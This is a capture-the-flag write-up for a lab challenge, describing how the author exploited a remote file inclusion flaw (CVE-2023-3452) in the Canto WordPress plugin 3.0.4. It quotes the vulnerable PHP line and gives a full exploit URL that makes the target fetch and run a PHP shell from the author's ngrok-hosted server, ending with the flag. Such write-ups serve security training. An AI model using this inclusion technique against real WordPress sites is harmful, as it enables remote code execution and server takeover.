On-Premise-01: Vulnerable Canto WordPress Plugin

Challenge Description: Secure Corp integrates the Canto plugin for WordPress to manage its digital assets and streamline workflows. The plugin facilitates importing and managing images and other assets directly from the browser, using metadata and automation features. During your investigation, you identify an unusual behavior in the plugin’s handling of remote requests. This behavior could enable attackers to include and execute unauthorized code, provided certain conditions are met. Your task is to exploit this flaw to compromise the server and demonstrate the risk.

• Lab description mentioned the use of canto plugin, I did some recon and I found that an RCE is present in a certain version of canto (CVE-2023–3452).

• Further recon helped me identify that plugins are located at /wp-content/plugins/canto

• found the readme file at / wp-content/plugins/canto/readme.txt

• From the readme file i found that the version used is Stable tag: 3.0.4

Which confirms this RCE vulnerability.

• From CVE listing and other sources i found that the vulnerability is caused by this line in the plugins download.php file:

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

• The wp_abspath is user controlled, allows remote inclusion of PHP code when allow_url_include is enabled.

• To exploit : I created a directory with the name wp-admin and a file inside it named admin.php with a simple php shell.

• Started python http server, exposed to public via ngrok

Supplied the link to the challenge page https://red.infinity.cyberwarfare.live/r24f5e32785d4e01b57a457f0e4330fx/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=https://37a4b3d1479f.ngrok-free.app&cmd=ls RCE found, i tried traversing directories to find the flag,txt present in root directory

Flag = CWL{m@n@g3_y0uR_D1g1t@L_A$$3t5}